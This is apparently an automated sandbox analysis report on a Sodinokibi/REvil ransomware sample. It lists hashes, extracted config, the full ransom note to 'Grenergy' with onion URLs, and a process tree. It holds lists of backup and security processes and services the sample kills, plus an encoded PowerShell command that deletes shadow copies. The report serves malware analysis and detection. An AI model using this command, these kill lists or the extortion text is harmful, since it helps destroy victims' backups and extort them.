Analysis

  • max time kernel
    91s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    05-03-2022 20:58

General

  • Target

    e8cf5d5825e19d3a92a8d81cc86eb03d2eebb18d333dcec743b04769257071a2.exe

  • Size

    119KB

  • MD5

    53665ee039f02304c7c3d74b75feb9cc

  • SHA1

    1762e80d5e968fd75f66936fcc1037ab47daa3b1

  • SHA256

    e8cf5d5825e19d3a92a8d81cc86eb03d2eebb18d333dcec743b04769257071a2

  • SHA512

    76987b1367051047009b371374052a6f313aa7eca0861bf4335d2523d22322bb342197f429d5b3f6906d93521f7bd8a3f6e98c3d4221172bc36a9939594b497d

Malware Config

Extracted

Path

C:\s5mrh81-README.txt

Ransom Note
Hello, Grenergy! [+] What's Happened? [+] Your files have been encrypted and currently unavailable. You can check it. All files in your system have s5mrh81 extension. By the way, everything is possible to recover (restore) but you should follow our instructions. Otherwise you can NEVER return your data. If you decline to pay, your files will be published in our blog http://2xultdmexzfolaylojzgucu53aynvs6d7igkgeky3diw5rml3w6plpid.onion/post/51b8300fae856b17786a1ca7aa7a7654b6ca2e74941d8f5369b54147fed32000 [+] What are our guarantees? [+] It's just a business and we care only about getting benefits. If we don't meet our obligations, nobody will deal with us. It doesn't hold our interest. So you can check the ability to restore your files. For this purpose you should visit our website where you can decrypt one file for free. That is our guarantee. It doesn't metter for us whether you cooperate with us or not. But if you don't, you'll lose your time and data cause only we have the private key to decrypt your files. In practice - time is much more valuable than money. [+] How to get access to our website? [+] Use TOR browser: 1. Download and install TOR browser from this site: https://torproject.org/ 2. Visit our website: http://4to43yp4mng2gdc3jgnep5bt7lkhqvjqiritbv4x2ebj3qun7wz4y2id.onion When you visit our website, put the following data into the input form: Key: 2dv/J5DV6jy4iB2fuSXSwyJzLqKZ3uxNXBt0ibEadgp9ySErHGv7UAj5imAxmFy0 5XT2fe1NcHCZQjKxKrMX/8bBGYDkBOiqXvzxlbEQQDR4fypbnZkqtHa1QT56phUU C7TvlP4YkjmVbn80Vu+vovR+E1Yq7khXhLtAREV6HROkpxnednfjLiT5f/wVl2kP zzN8RqXEydB64Snl6B/gN8yPVL8jfLWb77GTVrhTp6BhbFD7W0ojnGFyZztSWky5 YJHNuKeUqWp+o99priPDI0EbOAn/GOO/OLDT0pp5sH26nCB8xvz+xxjhWeO3hgyI KTxPXcoKqBj4Scw4wefbsqFAhQtVgM8FD+psEcWqrbsZ+eJG9V5FprAnpf0Csl5W IbJ4tFwGrut+95CACL0knd8Cb35ZrUG5dTcatv3VE0LQk7Ca+Ne8U78eVL+q0lPq C2Bo4Q/LRFDeUIu2O4uQbjbvgGKslU3J7JUGZRTtqlT/l4spm1p5gYWhx6znFlvP X5gO0SU5jbapVR/ZUfsFCjPExTr5n+h9yVDrzkiBh6dPSMR1Ogp9PTJB2V9wefHm 617DGlTymooPlaSG7qmFib/pkaVufDNYotyMdxCcBdxMnWb3tVLic2+xgQnqxk4I 43w1OecurOukPu4yMr8Bz4Hp4MN3ZpF3FmO1cSdgj42TBIc1K2InPkLN05boa6+z 6lbd6wl7tLJ4IuQ/F/nsyNOBVG+cXgai7z8wO46h3BmS5QAnf2mP3emWrfymXDkx SAFsjNRYnHryOuBMhrCK98Zf0Rdm9kJi5TVMDRZoVTqJwNSswJ1OjTymsRXQGeWq c7cHDbNXcybcU6g7CUjICdiX+LTBDxQ9Jv4eqAnw1Sy/6BEJq08MNOZRE37tQhfa ZHXcuRxDTw35gFtSySzoSk4+R4oCmBhUbOmY03S9JTGYoRStyAX5Fo0chPX4pWWo is6w02lxRONOb0t1wnsTsaOXAClGJOH46knTe5N7r+bSKGsNW6g1K6xePUsIXOKU 29loT4hiBwbfMnjjJRwy4beqI92IPSquZ0e+YfyLlhMyeGncaz3bH/6kTBQTgDlC k8pXyeURjY+Kdp2LFpzZsRK3cUuFFbHjtUrey+XjmJITnTXOu3fOdLgz/27QX6mV wjFJJH6WaHdZW9zBA0dybEvZaZM6wwbqengvoRJuw+aN0jFBnNmRHuspHy0MmVCV 3DWB9X9PO+0zBXX9bqk1+JHL6Wlw6uApfjgWLxandsFb3JKXm+3hm5JEIQW0s2Tc B2PaZ/VsTQ0SxYPk+WPDTWhEKtE8xeuxZkCXFw== !!! DANGER !!! DON'T try to change files by yourself, DON'T use any third party software or antivirus solutions to restore your data - it may entail the private key damage and as a result all your data loss! !!! !!! !!! ONE MORE TIME: It's in your best interests to get your files back. From our side we (the best specialists in this sphere) ready to make everything for restoring but please do not interfere. !!! !!! !!
URLs

http://2xultdmexzfolaylojzgucu53aynvs6d7igkgeky3diw5rml3w6plpid.onion/post/51b8300fae856b17786a1ca7aa7a7654b6ca2e74941d8f5369b54147fed32000

http://4to43yp4mng2gdc3jgnep5bt7lkhqvjqiritbv4x2ebj3qun7wz4y2id.onion

Extracted

Family

sodinokibi

Botnet

$2b$13$wz1reRfdLg.aiStLDqg5JeqqySemSPatWKHdwbpWVrC3ty7Akscg6

Campaign

67

Attributes
  • net

    false

  • pid

    $2b$13$wz1reRfdLg.aiStLDqg5JeqqySemSPatWKHdwbpWVrC3ty7Akscg6

  • prc

    vsnapvss

    EnterpriseClient

    firefox

    infopath

    cvd

    tv_x64.exe

    VeeamTransportSvc

    steam

    encsvc

    mydesktopservice

    outlook

    synctime

    ocssd

    SAP

    cvfwd

    bengien

    vxmon

    bedbh

    ocomm

    ocautoupds

    raw_agent_svc

    oracle

    disk+work

    powerpnt

    saposcol

    sqbcoreservice

    sapstartsrv

    beserver

    saphostexec

    dbeng50

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-README.txt and follow instuctions

  • ransom_template

    Hello, Grenergy! [+] What's Happened? [+] Your files have been encrypted and currently unavailable. You can check it. All files in your system have {EXT} extension. By the way, everything is possible to recover (restore) but you should follow our instructions. Otherwise you can NEVER return your data. If you decline to pay, your files will be published in our blog http://2xultdmexzfolaylojzgucu53aynvs6d7igkgeky3diw5rml3w6plpid.onion/post/51b8300fae856b17786a1ca7aa7a7654b6ca2e74941d8f5369b54147fed32000 [+] What are our guarantees? [+] It's just a business and we care only about getting benefits. If we don't meet our obligations, nobody will deal with us. It doesn't hold our interest. So you can check the ability to restore your files. For this purpose you should visit our website where you can decrypt one file for free. That is our guarantee. It doesn't metter for us whether you cooperate with us or not. But if you don't, you'll lose your time and data cause only we have the private key to decrypt your files. In practice - time is much more valuable than money. [+] How to get access to our website? [+] Use TOR browser: 1. Download and install TOR browser from this site: https://torproject.org/ 2. Visit our website: http://4to43yp4mng2gdc3jgnep5bt7lkhqvjqiritbv4x2ebj3qun7wz4y2id.onion When you visit our website, put the following data into the input form: Key: {KEY} !!! DANGER !!! DON'T try to change files by yourself, DON'T use any third party software or antivirus solutions to restore your data - it may entail the private key damage and as a result all your data loss! !!! !!! !!! ONE MORE TIME: It's in your best interests to get your files back. From our side we (the best specialists in this sphere) ready to make everything for restoring but please do not interfere. !!! !!! !!

  • sub

    67

  • svc

    QBCFMonitorService

    thebat

    dbeng50

    winword

    dbsnmp

    VeeamTransportSvc

    disk+work

    TeamViewer_Service.exe

    firefox

    QBIDPService

    steam

    onenote

    CVMountd

    cvd

    VeeamDeploymentSvc

    VeeamNFSSvc

    bedbh

    mydesktopqos

    avscc

    infopath

    cvfwd

    excel

    beserver

    powerpnt

    mspub

    synctime

    QBDBMgrN

    tv_w32.exe

    EnterpriseClient

    msaccess

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 9 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 34 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e8cf5d5825e19d3a92a8d81cc86eb03d2eebb18d333dcec743b04769257071a2.exe
    "C:\Users\Admin\AppData\Local\Temp\e8cf5d5825e19d3a92a8d81cc86eb03d2eebb18d333dcec743b04769257071a2.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:844
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:540
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:3460
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2696

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/540-135-0x0000020D74230000-0x0000020D74252000-memory.dmp
      Filesize

      136KB

    • memory/540-138-0x00007FFE670E0000-0x00007FFE67BA1000-memory.dmp
      Filesize

      10.8MB

    • memory/540-139-0x0000020D5AB66000-0x0000020D5AB68000-memory.dmp
      Filesize

      8KB

    • memory/540-140-0x0000020D5AB60000-0x0000020D5AB62000-memory.dmp
      Filesize

      8KB

    • memory/540-141-0x0000020D5AB63000-0x0000020D5AB65000-memory.dmp
      Filesize

      8KB

    • memory/844-130-0x0000000000D80000-0x0000000000DA0000-memory.dmp
      Filesize

      128KB